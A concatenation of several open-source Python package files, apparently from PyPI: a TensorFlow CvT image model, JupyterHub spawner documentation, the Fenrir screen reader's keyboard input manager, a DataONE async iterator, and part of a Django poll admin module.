Convolutional Transformer Block composed by attention layers, normalization and multi-layer perceptrons (mlps). It
consists of 3 chunks : an attention layer, an intermediate dense layer and an output layer. This corresponds to the
`Block` class in the original implementation.
"""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
drop_rate: float,
mlp_ratio: float,
drop_path_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.attention = TFCvtAttention(
config,
num_heads,
embed_dim,
kernel_size,
stride_q,
stride_kv,
padding_q,
padding_kv,
qkv_projection_method,
qkv_bias,
attention_drop_rate,
drop_rate,
with_cls_token,
name="attention",
)
self.intermediate = TFCvtIntermediate(
config, embed_dim, mlp_ratio, name="intermediate"
)
self.dense_output = TFCvtOutput(config, embed_dim, drop_rate, name="output")
# Using `layers.Activation` instead of `tf.identity` to better control `training` behaviour.
self.drop_path = (
TFCvtDropPath(drop_path_rate, name="drop_path")
if drop_path_rate > 0.0
else tf.keras.layers.Activation("linear", name="drop_path")
)
# Using the same default epsilon as PyTorch
self.layernorm_before = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm_before"
)
self.layernorm_after = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm_after"
)
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
) -> tf.Tensor:
# in Cvt, layernorm is applied before self-attention
attention_output = self.attention(
self.layernorm_before(hidden_state), height, width, training=training
)
attention_output = self.drop_path(attention_output, training=training)
# first residual connection
hidden_state = attention_output + hidden_state
# in Cvt, layernorm is also applied after self-attention
layer_output = self.layernorm_after(hidden_state)
layer_output = self.intermediate(layer_output)
# second residual connection is done here
layer_output = self.dense_output(layer_output, hidden_state)
layer_output = self.drop_path(layer_output, training=training)
return layer_output
class TFCvtStage(tf.keras.layers.Layer):
"""
Cvt stage (encoder block). Each stage has 2 parts :
- (1) A Convolutional Token Embedding layer
- (2) A Convolutional Transformer Block (layer).
The classification token is added only in the last stage.
Args:
config ([`CvtConfig`]): Model configuration class.
stage (`int`): Stage number.
"""
def __init__(self, config: CvtConfig, stage: int, **kwargs):
super().__init__(**kwargs)
self.config = config
self.stage = stage
if self.config.cls_token[self.stage]:
self.cls_token = self.add_weight(
shape=(1, 1, self.config.embed_dim[-1]),
initializer=get_initializer(self.config.initializer_range),
trainable=True,
name="cvt.encoder.stages.2.cls_token",
)
self.embedding = TFCvtEmbeddings(
self.config,
patch_size=config.patch_sizes[self.stage],
stride=config.patch_stride[self.stage],
embed_dim=config.embed_dim[self.stage],
padding=config.patch_padding[self.stage],
dropout_rate=config.drop_rate[self.stage],
name="embedding",
)
drop_path_rates = tf.linspace(
0.0, config.drop_path_rate[self.stage], config.depth[stage]
)
drop_path_rates = [x.numpy().item() for x in drop_path_rates]
self.layers = [
TFCvtLayer(
config,
num_heads=config.num_heads[self.stage],
embed_dim=config.embed_dim[self.stage],
kernel_size=config.kernel_qkv[self.stage],
stride_q=config.stride_q[self.stage],
stride_kv=config.stride_kv[self.stage],
padding_q=config.padding_q[self.stage],
padding_kv=config.padding_kv[self.stage],
qkv_projection_method=config.qkv_projection_method[self.stage],
qkv_bias=config.qkv_bias[self.stage],
attention_drop_rate=config.attention_drop_rate[self.stage],
drop_rate=config.drop_rate[self.stage],
mlp_ratio=config.mlp_ratio[self.stage],
drop_path_rate=drop_path_rates[self.stage],
with_cls_token=config.cls_token[self.stage],
name=f"layers.{j}",
)
for j in range(config.depth[self.stage])
]
def call(self, hidden_state: tf.Tensor, training: bool = False):
cls_token = None
hidden_state = self.embedding(hidden_state, training)
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(hidden_state)
hidden_size = height * width
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, num_channels)
)
if self.config.cls_token[self.stage]:
cls_token = tf.repeat(self.cls_token, repeats=batch_size, axis=0)
hidden_state = tf.concat((cls_token, hidden_state), axis=1)
for layer in self.layers:
layer_outputs = layer(hidden_state, height, width, training=training)
hidden_state = layer_outputs
if self.config.cls_token[self.stage]:
cls_token, hidden_state = tf.split(hidden_state, [1, height * width], 1)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, height, width, num_channels)
)
return hidden_state, cls_token
class TFCvtEncoder(tf.keras.layers.Layer):
"""
Convolutional Vision Transformer encoder. CVT has 3 stages of encoder blocks with their respective number of layers
(depth) being 1, 2 and 10.
Args:
config ([`CvtConfig`]): Model configuration class.
"""
config_class = CvtConfig
def __init__(self, config: CvtConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.stages = [
TFCvtStage(config, stage_idx, name=f"stages.{stage_idx}")
for stage_idx in range(len(config.depth))
]
def call(
self,
pixel_values: TFModelInputType,
output_hidden_states: Optional[bool] = False,
return_dict: Optional[bool] = True,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
all_hidden_states = () if output_hidden_states else None
hidden_state = pixel_values
# When running on CPU, `tf.keras.layers.Conv2D` doesn't support (batch_size, num_channels, height, width)
# as input format. So change the input format to (batch_size, height, width, num_channels).
hidden_state = tf.transpose(hidden_state, perm=(0, 2, 3, 1))
cls_token = None
for _, (stage_module) in enumerate(self.stages):
hidden_state, cls_token = stage_module(hidden_state, training=training)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
# Change back to (batch_size, num_channels, height, width) format to have uniformity in the modules
hidden_state = tf.transpose(hidden_state, perm=(0, 3, 1, 2))
if output_hidden_states:
all_hidden_states = tuple(
[tf.transpose(hs, perm=(0, 3, 1, 2)) for hs in all_hidden_states]
)
if not return_dict:
return tuple(
v for v in [hidden_state, cls_token, all_hidden_states] if v is not None
)
return TFBaseModelOutputWithCLSToken(
last_hidden_state=hidden_state,
cls_token_value=cls_token,
hidden_states=all_hidden_states,
)
@keras_serializable
class TFCvtMainLayer(tf.keras.layers.Layer):
"""Construct the Cvt model."""
config_class = CvtConfig
def __init__(self, config: CvtConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.encoder = TFCvtEncoder(config, name="encoder")
@unpack_inputs
def call(
self,
pixel_values: Optional[TFModelInputType] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
encoder_outputs = self.encoder(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = encoder_outputs[0]
if not return_dict:
return (sequence_output,) + encoder_outputs[1:]
return TFBaseModelOutputWithCLSToken(
last_hidden_state=sequence_output,
cls_token_value=encoder_outputs.cls_token_value,
hidden_states=encoder_outputs.hidden_states,
)
class TFCvtPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = CvtConfig
base_model_prefix = "cvt"
main_input_name = "pixel_values"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
"""
Dummy inputs to build the network.
Returns:
`Dict[str, tf.Tensor]`: The dummy inputs.
"""
VISION_DUMMY_INPUTS = tf.random.uniform(
shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32
)
return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
@tf.function(
input_signature=[
{
"pixel_values": tf.TensorSpec(
(None, None, None, None), tf.float32, name="pixel_values"
),
}
]
)
def serving(self, inputs):
"""
Method used for serving the model.
Args:
inputs (`Dict[str, tf.Tensor]`):
The input of the saved model as a dictionary of tensors.
"""
output = self.call(inputs)
return self.serving_output(output)
TFCVT_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TF 2.0 models accepts two formats as inputs:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional arguments.
This second option is useful when using [`tf.keras.Model.fit`] method which currently requires having all the
tensors in the first argument of the model call function: `model(inputs)`.
</Tip>
Args:
config ([`CvtConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
TFCVT_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`np.ndarray`, `tf.Tensor`, `List[tf.Tensor]` ``Dict[str, tf.Tensor]` or `Dict[str, np.ndarray]` and each example must have the shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoFeatureExtractor`]. See
[`AutoFeatureExtractor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False``):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@add_start_docstrings(
"The bare Cvt Model transformer outputting raw hidden-states without any specific head on top.",
TFCVT_START_DOCSTRING,
)
class TFCvtModel(TFCvtPreTrainedModel):
def __init__(self, config: CvtConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.cvt = TFCvtMainLayer(config, name="cvt")
@unpack_inputs
@add_start_docstrings_to_model_forward(TFCVT_INPUTS_DOCSTRING)
@replace_return_docstrings(
output_type=TFBaseModelOutputWithCLSToken, config_class=_CONFIG_FOR_DOC
)
def call(
self,
pixel_values: Optional[tf.Tensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFBaseModelOutputWithCLSToken, Tuple[tf.Tensor]]:
r"""
Returns:
Examples:
```python
>>> from transformers import AutoFeatureExtractor, TFCvtModel
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = AutoFeatureExtractor.from_pretrained("microsoft/cvt-13")
>>> model = TFCvtModel.from_pretrained("microsoft/cvt-13")
>>> inputs = feature_extractor(images=image, return_tensors="tf")
>>> outputs = model(**inputs)
>>> last_hidden_states = outputs.last_hidden_state
```"""
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
outputs = self.cvt(
pixel_values=pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
if not return_dict:
return (outputs[0],) + outputs[1:]
return TFBaseModelOutputWithCLSToken(
last_hidden_state=outputs.last_hidden_state,
cls_token_value=outputs.cls_token_value,
hidden_states=outputs.hidden_states,
)
def serving_output(
self, output: TFBaseModelOutputWithCLSToken
) -> TFBaseModelOutputWithCLSToken:
return TFBaseModelOutputWithCLSToken(
last_hidden_state=output.last_hidden_state,
cls_token_value=output.cls_token_value,
hidden_states=output.hidden_states,
)
@add_start_docstrings(
"""
Cvt Model transformer with an image classification head on top (a linear layer on top of the final hidden state of
the [CLS] token) e.g. for ImageNet.
""",
TFCVT_START_DOCSTRING,
)
class TFCvtForImageClassification(TFCvtPreTrainedModel, TFSequenceClassificationLoss):
def __init__(self, config: CvtConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.cvt = TFCvtMainLayer(config, name="cvt")
# Using same default epsilon as in the original implementation.
self.layernorm = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="layernorm"
)
# Classifier head
self.classifier = tf.keras.layers.Dense(
units=config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=True,
bias_initializer="zeros",
name="classifier",
)
@unpack_inputs
@add_start_docstrings_to_model_forward(TFCVT_INPUTS_DOCSTRING)
@replace_return_docstrings(
output_type=TFImageClassifierOutputWithNoAttention, config_class=_CONFIG_FOR_DOC
)
def call(
self,
pixel_values: Optional[tf.Tensor] = None,
labels: Optional[tf.Tensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
) -> Union[TFImageClassifierOutputWithNoAttention, Tuple[tf.Tensor]]:
r"""
labels (`tf.Tensor` or `np.ndarray` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
Returns:
Examples:
```python
>>> from transformers import AutoFeatureExtractor, TFCvtForImageClassification
>>> import tensorflow as tf
>>> from PIL import Image
>>> import requests
>>> url = "http://images.cocodataset.org/val2017/000000039769.jpg"
>>> image = Image.open(requests.get(url, stream=True).raw)
>>> feature_extractor = AutoFeatureExtractor.from_pretrained("microsoft/cvt-13")
>>> model = TFCvtForImageClassification.from_pretrained("microsoft/cvt-13")
>>> inputs = feature_extractor(images=image, return_tensors="tf")
>>> outputs = model(**inputs)
>>> logits = outputs.logits
>>> # model predicts one of the 1000 ImageNet classes
>>> predicted_class_idx = tf.math.argmax(logits, axis=-1)[0]
>>> print("Predicted class:", model.config.id2label[int(predicted_class_idx)])
```"""
outputs = self.cvt(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = outputs[0]
cls_token = outputs[1]
if self.config.cls_token[-1]:
sequence_output = self.layernorm(cls_token)
else:
# rearrange "batch_size, num_channels, height, width -> batch_size, (height*width), num_channels"
batch_size, num_channels, height, width = shape_list(sequence_output)
sequence_output = tf.reshape(
sequence_output, shape=(batch_size, num_channels, height * width)
)
sequence_output = tf.transpose(sequence_output, perm=(0, 2, 1))
sequence_output = self.layernorm(sequence_output)
sequence_output_mean = tf.reduce_mean(sequence_output, axis=1)
logits = self.classifier(sequence_output_mean)
loss = (
None
if labels is None
else self.hf_compute_loss(labels=labels, logits=logits)
)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TFImageClassifierOutputWithNoAttention(
loss=loss, logits=logits, hidden_states=outputs.hidden_states
)
def serving_output(
self, output: TFImageClassifierOutputWithNoAttention
) -> TFImageClassifierOutputWithNoAttention:
return TFImageClassifierOutputWithNoAttention(
logits=output.logits, hidden_states=output.hidden_states
) | PypiClean |
/jupyterhub-sdp-0.9.0.1.tar.gz/jupyterhub-sdp-0.9.0.1/docs/source/getting-started/spawners-basics.md | # Spawners and single-user notebook servers
Since the single-user server is an instance of `jupyter notebook`, an entire separate
multi-process application, there are many aspect of that server can configure, and a lot of ways
to express that configuration.
At the JupyterHub level, you can set some values on the Spawner. The simplest of these is
`Spawner.notebook_dir`, which lets you set the root directory for a user's server. This root
notebook directory is the highest level directory users will be able to access in the notebook
dashboard. In this example, the root notebook directory is set to `~/notebooks`, where `~` is
expanded to the user's home directory.
```python
c.Spawner.notebook_dir = '~/notebooks'
```
You can also specify extra command-line arguments to the notebook server with:
```python
c.Spawner.args = ['--debug', '--profile=PHYS131']
```
This could be used to set the users default page for the single user server:
```python
c.Spawner.args = ['--NotebookApp.default_url=/notebooks/Welcome.ipynb']
```
Since the single-user server extends the notebook server application,
it still loads configuration from the `jupyter_notebook_config.py` config file.
Each user may have one of these files in `$HOME/.jupyter/`.
Jupyter also supports loading system-wide config files from `/etc/jupyter/`,
which is the place to put configuration that you want to affect all of your users.
| PypiClean |
/fenrir-screenreader-1.9.6.post1.tar.gz/fenrir-screenreader-1.9.6.post1/src/fenrirscreenreader/core/inputManager.py |
# Fenrir TTY screen reader
# By Chrys, Storm Dragon, and contributers.
from fenrirscreenreader.core import debug
from fenrirscreenreader.core import inputData
import os, inspect, time
currentdir = os.path.dirname(os.path.realpath(os.path.abspath(inspect.getfile(inspect.currentframe()))))
fenrirPath = os.path.dirname(currentdir)
class inputManager():
def __init__(self):
self.shortcutType = 'KEY'
self.executeDeviceGrab = False
def setShortcutType(self, shortcutType = 'KEY'):
if shortcutType in ['KEY', 'BYTE']:
self.shortcutType = shortcutType
def getShortcutType(self):
return self.shortcutType
def initialize(self, environment):
self.env = environment
self.env['runtime']['settingsManager'].loadDriver(\
self.env['runtime']['settingsManager'].getSetting('keyboard', 'driver'), 'inputDriver')
self.updateInputDevices()
# init LEDs with current state
self.env['input']['newNumLock'] = self.env['runtime']['inputDriver'].getLedState()
self.env['input']['oldNumLock'] = self.env['input']['newNumLock']
self.env['input']['newCapsLock'] = self.env['runtime']['inputDriver'].getLedState(1)
self.env['input']['oldCapsLock'] = self.env['input']['newCapsLock']
self.env['input']['newScrollLock'] = self.env['runtime']['inputDriver'].getLedState(2)
self.env['input']['oldScrollLock'] = self.env['input']['newScrollLock']
self.lastDeepestInput = []
self.env['input']['shortcutRepeat'] = 1
self.lastInputTime = time.time()
def shutdown(self):
self.removeAllDevices()
self.env['runtime']['settingsManager'].shutdownDriver('inputDriver')
def getInputEvent(self):
event = None
try:
event = self.env['runtime']['inputDriver'].getInputEvent()
except:
pass
return event
def setExecuteDeviceGrab(self, newExecuteDeviceGrab = True):
self.executeDeviceGrab = newExecuteDeviceGrab
def handleDeviceGrab(self):
if not self.executeDeviceGrab:
return
if self.env['input']['eventBuffer'] != []:
return
if not self.noKeyPressed():
return
if not self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
return
if self.env['runtime']['screenManager'].getCurrScreenIgnored():
self.ungrabAllDevices()
else:
self.grabAllDevices()
self.executeDeviceGrab = False
def sendKeys(self, keyMacro):
for e in keyMacro:
key = ''
value = 0
if len(e) != 2:
continue
if isinstance(e[0], int) and isinstance(e[1], str):
key = e[1].upper()
value = e[0]
elif isinstance(e[1], int) and isinstance(e[0], str):
key = e[0].upper()
value = e[1]
else:
continue
if key.upper() == 'SLEEP':
time.sleep(value)
else:
self.env['runtime']['inputDriver'].sendKey(key, value)
def handleInputEvent(self, eventData):
#print(eventData)
if not eventData:
return
# a hang apears.. try to fix
if self.env['input']['eventBuffer'] == []:
if self.env['input']['currInput'] != []:
self.env['input']['currInput'] = []
self.env['input']['shortcutRepeat'] = 1
self.env['input']['prevInput'] = self.env['input']['currInput'].copy()
if eventData['EventState'] == 0:
if eventData['EventName'] in self.env['input']['currInput']:
self.env['input']['currInput'].remove(eventData['EventName'])
if len(self.env['input']['currInput']) > 1:
self.env['input']['currInput'] = sorted(self.env['input']['currInput'])
elif len(self.env['input']['currInput']) == 0:
self.env['input']['shortcutRepeat'] = 1
self.lastInputTime = time.time()
elif eventData['EventState'] == 1:
if not eventData['EventName'] in self.env['input']['currInput']:
self.env['input']['currInput'].append(eventData['EventName'])
if len(self.env['input']['currInput']) > 1:
self.env['input']['currInput'] = sorted(self.env['input']['currInput'])
if len(self.lastDeepestInput) < len(self.env['input']['currInput']):
self.setLastDeepestInput( self.env['input']['currInput'].copy())
elif self.lastDeepestInput == self.env['input']['currInput']:
if time.time() - self.lastInputTime <= self.env['runtime']['settingsManager'].getSettingAsFloat('keyboard','doubleTapTimeout'):
self.env['input']['shortcutRepeat'] += 1
else:
self.env['input']['shortcutRepeat'] = 1
self.handleLedStates(eventData)
self.lastInputTime = time.time()
elif eventData['EventState'] == 2:
self.lastInputTime = time.time()
self.env['input']['oldNumLock'] = self.env['input']['newNumLock']
self.env['input']['newNumLock'] = self.env['runtime']['inputDriver'].getLedState()
self.env['input']['oldCapsLock'] = self.env['input']['newCapsLock']
self.env['input']['newCapsLock'] = self.env['runtime']['inputDriver'].getLedState(1)
self.env['input']['oldScrollLock'] = self.env['input']['newScrollLock']
self.env['input']['newScrollLock'] = self.env['runtime']['inputDriver'].getLedState(2)
self.env['runtime']['debug'].writeDebugOut("currInput " + str(self.env['input']['currInput'] ) ,debug.debugLevel.INFO)
if self.noKeyPressed():
self.env['input']['prevInput'] = []
self.handleDeviceGrab()
def handleLedStates(self, mEvent):
try:
if mEvent['EventName'] == 'KEY_NUMLOCK':
self.env['runtime']['inputDriver'].toggleLedState()
elif mEvent['EventName'] == 'KEY_CAPSLOCK':
self.env['runtime']['inputDriver'].toggleLedState(1)
elif mEvent['EventName'] == 'KEY_SCROLLLOCK':
self.env['runtime']['inputDriver'].toggleLedState(2)
except:
pass
def grabAllDevices(self):
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
try:
self.env['runtime']['inputDriver'].grabAllDevices()
except Exception as e:
pass
def ungrabAllDevices(self):
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
try:
self.env['runtime']['inputDriver'].ungrabAllDevices()
except Exception as e:
pass
def handlePlugInputDevice(self, eventData):
self.env['runtime']['inputManager'].updateInputDevices(eventData)
def updateInputDevices(self, newDevice = None):
try:
self.env['runtime']['inputDriver'].updateInputDevices(newDevice)
except:
pass
self.setExecuteDeviceGrab()
try:
if self.env['runtime']['screenManager']:
self.handleDeviceGrab()
except:
pass
def removeAllDevices(self):
try:
self.env['runtime']['inputDriver'].removeAllDevices()
except:
pass
def convertEventName(self, eventName):
if not eventName:
return ''
if eventName == '':
return ''
eventName = eventName.upper()
if eventName == 'KEY_LEFTCTRL':
eventName = 'KEY_CTRL'
elif eventName == 'KEY_RIGHTCTRL':
eventName = 'KEY_CTRL'
elif eventName == 'KEY_LEFTSHIFT':
eventName = 'KEY_SHIFT'
elif eventName == 'KEY_RIGHTSHIFT':
eventName = 'KEY_SHIFT'
elif eventName == 'KEY_LEFTALT':
eventName = 'KEY_ALT'
elif eventName == 'KEY_RIGHTALT':
eventName = 'KEY_ALT'
elif eventName == 'KEY_LEFTMETA':
eventName = 'KEY_META'
elif eventName == 'KEY_RIGHTMETA':
eventName = 'KEY_META'
if self.isFenrirKey(eventName):
eventName = 'KEY_FENRIR'
if self.isScriptKey(eventName):
eventName = 'KEY_SCRIPT'
return eventName
def clearEventBuffer(self):
try:
self.env['runtime']['inputDriver'].clearEventBuffer()
except Exception as e:
pass
def setLastDeepestInput(self, currentDeepestInput):
self.lastDeepestInput = currentDeepestInput
def clearLastDeepInput(self):
self.lastDeepestInput = []
def getLastInputTime(self):
return self.lastInputTime
def getLastDeepestInput(self):
return self.lastDeepestInput
def writeEventBuffer(self):
try:
if self.env['runtime']['settingsManager'].getSettingAsBool('keyboard', 'grabDevices'):
self.env['runtime']['inputDriver'].writeEventBuffer()
self.clearEventBuffer()
except Exception as e:
self.env['runtime']['debug'].writeDebugOut("Error while writeUInput",debug.debugLevel.ERROR)
self.env['runtime']['debug'].writeDebugOut(str(e),debug.debugLevel.ERROR)
def noKeyPressed(self):
return self.env['input']['currInput'] == []
def isKeyPress(self):
return (self.env['input']['prevInput'] == []) and (self.env['input']['currInput'] != [])
def getPrevDeepestShortcut(self):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.getLastDeepestInput())
return str(shortcut)
def getPrevShortcut(self):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.env['input']['prevInput'])
return str(shortcut)
def getCurrShortcut(self, inputSequence = None):
shortcut = []
shortcut.append(self.env['input']['shortcutRepeat'])
if inputSequence:
shortcut.append(inputSequence)
else:
shortcut.append(self.env['input']['currInput'])
if len(self.env['input']['prevInput']) < len(self.env['input']['currInput']):
if self.env['input']['shortcutRepeat'] > 1 and not self.shortcutExists(str(shortcut)):
shortcut = []
self.env['input']['shortcutRepeat'] = 1
shortcut.append(self.env['input']['shortcutRepeat'])
shortcut.append(self.env['input']['currInput'])
self.env['runtime']['debug'].writeDebugOut("currShortcut " + str(shortcut) ,debug.debugLevel.INFO)
return str(shortcut)
def currKeyIsModifier(self):
if len(self.getLastDeepestInput()) != 1:
return False
return (self.env['input']['currInput'][0] =='KEY_FENRIR') or (self.env['input']['currInput'][0] == 'KEY_SCRIPT')
def isFenrirKey(self, eventName):
return eventName in self.env['input']['fenrirKey']
def isScriptKey(self, eventName):
return eventName in self.env['input']['scriptKey']
def getCommandForShortcut(self, shortcut):
if not self.shortcutExists(shortcut):
return ''
return self.env['bindings'][shortcut]
def shortcutExists(self, shortcut):
return(shortcut in self.env['bindings'])
def loadShortcuts(self, kbConfigPath=fenrirPath + '/../../config/keyboard/desktop.conf'):
kbConfig = open(kbConfigPath,"r")
while(True):
invalid = False
line = kbConfig.readline()
if not line:
break
line = line.replace('\n','')
if line.replace(" ","") == '':
continue
if line.replace(" ","").startswith("#"):
continue
if line.count("=") != 1:
continue
sepLine = line.split('=')
commandName = sepLine[1].upper()
sepLine[0] = sepLine[0].replace(" ","")
sepLine[0] = sepLine[0].replace("'","")
sepLine[0] = sepLine[0].replace('"',"")
keys = sepLine[0].split(',')
shortcutKeys = []
shortcutRepeat = 1
shortcut = []
for key in keys:
try:
shortcutRepeat = int(key)
except:
if not self.isValidKey(key.upper()):
self.env['runtime']['debug'].writeDebugOut("invalid key : "+ key.upper() + ' command:' +commandName ,debug.debugLevel.WARNING)
invalid = True
break
shortcutKeys.append(key.upper())
if invalid:
continue
shortcut.append(shortcutRepeat)
shortcut.append(sorted(shortcutKeys))
if len(shortcutKeys) != 1 and not 'KEY_FENRIR' in shortcutKeys:
self.env['runtime']['debug'].writeDebugOut("invalid shortcut (missing KEY_FENRIR): "+ str(shortcut) + ' command:' +commandName ,debug.debugLevel.ERROR)
continue
self.env['runtime']['debug'].writeDebugOut("Shortcut: "+ str(shortcut) + ' command:' +commandName ,debug.debugLevel.INFO, onAnyLevel=True)
self.env['bindings'][str(shortcut)] = commandName
kbConfig.close()
# fix bindings
self.env['bindings'][str([1, ['KEY_F1', 'KEY_FENRIR']])] = 'TOGGLE_TUTORIAL_MODE'
def isValidKey(self, key):
return key in inputData.keyNames | PypiClean |
/dataone.libclient-3.5.2-py3-none-any.whl/d1_client/aio/iter/base_async.py | """Base for Async ObjectList and EventLog Iterator.
"""
import asyncio
import logging
import d1_common.types.exceptions
import d1_client.aio.async_client
PAGE_SIZE_ERROR_STR = """
The remote node returned a result page that contains fewer than the
requested number of records. As pages are downloaded concurrently by
this iterator, it cannot compensate. To ensure that all objects are
found by the iterator, switch to the traditional synchronous
version of this iterator. To skip this check, create the iterator with
ignore_errors=True. If using a command line client, start the client
with the the --ignore-errors switch.
"""
class IteratorBaseAsync(object):
def __init__(
self,
async_client,
page_size=d1_client.aio.async_client.DEFAULT_PAGE_SIZE,
list_arg_dict=None,
):
self.log = logging.getLogger(__name__)
self.async_client = async_client
self.page_size = page_size
self.list_arg_dict = list_arg_dict or {}
self._total = None
self.task_set = set()
self.another_task_set = set()
self.result_set = set()
self.ignore_errors = False
async def __aiter__(self):
"""Async iterator returning pyxb objects."""
await self.import_all()
while self.task_set or self.another_task_set or self.result_set:
self.log.debug(
"task_set={} another_task_set={} result_set={}".format(
len(self.task_set), len(self.another_task_set), len(self.result_set)
)
)
if not self.result_set:
await self.await_task()
continue
yield self.result_set.pop()
@property
async def total(self):
if self._total is None:
self._total = await self.get_total_count()
return self._total
def calc_page_count(self, total_count):
n_pages = (total_count - 1) // self.page_size + 1
return n_pages
# Async tasks
async def add_task(self, task_func):
if len(self.task_set) >= self.async_client.max_concurrent:
await self.await_task()
self.task_set.add(task_func)
async def await_task(self):
self.another_task_set.update(self.task_set)
self.task_set.clear()
result_set, new_task_set = await asyncio.wait(
self.another_task_set, return_when=asyncio.FIRST_COMPLETED
)
self.another_task_set = new_task_set
for r in result_set:
try:
# Raise any exception that occurred in task.
r.result()
except Exception as e:
if self.ignore_errors:
self.log.debug(
"Continuing after error (ignore_errors=True): {}".format(str(e))
)
else:
self.log.exception("Iterator error:")
raise
async def await_all(self):
while self.task_set or self.another_task_set:
await self.await_task()
def _page_check(self, page_idx, page_count, received_page_size):
self.log.debug(
"page_idx={} page_count={} received_page_size={} requested_page_size={}".format(
page_idx, page_count, received_page_size, self.page_size
)
)
if (
(not self.ignore_errors)
and page_idx < page_count - 1
and received_page_size != self.page_size
):
raise d1_common.types.exceptions.ServiceFailure(
0,
"{} page_idx={} page_count={} received_page_size={} requested_page_size={}".format(
PAGE_SIZE_ERROR_STR.strip(),
page_idx,
page_count,
received_page_size,
self.page_size,
),
)
# Override
async def import_all(self):
raise NotImplementedError
async def import_page(self, page_idx, page_count):
raise NotImplementedError
async def get_total_count(self):
raise NotImplementedError | PypiClean |
/opps-polls-0.1.6.tar.gz/opps-polls-0.1.6/opps/polls/admin.py | from django.contrib import admin
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from .models import (Poll, Choice, PollPost, PollBox,
PollBoxPolls, PollConfig)
from opps.core.admin import PublishableAdmin
from opps.core.admin import apply_opps_rules
from redactor.widgets import RedactorEditor
from opps.images.generate import image_url
class PollAdminForm(forms.ModelForm):
class Meta:
model = Poll
widgets = {"headline": RedactorEditor()}
class ChoiceInline(admin.TabularInline):
model = Choice
fk_name = 'poll'
raw_id_fields = ['image']
action = None
extra = 1
fieldsets = [(None, {'fields': ('choice', ('image', 'image_thumb'), 'order', 'votes')})]
readonly_fields = ['image_thumb']
def image_thumb(self, obj):
if obj.image:
return u'<img width="60px" height="60px" src="{0}" />'.format(
image_url(obj.image.image.url, width=60, height=60))
return _(u'No Image')
image_thumb.short_description = _(u'Thumbnail')
image_thumb.allow_tags = True
class PollPostInline(admin.TabularInline):
model = PollPost
fk_name = 'poll'
raw_id_fields = ['post']
actions = None
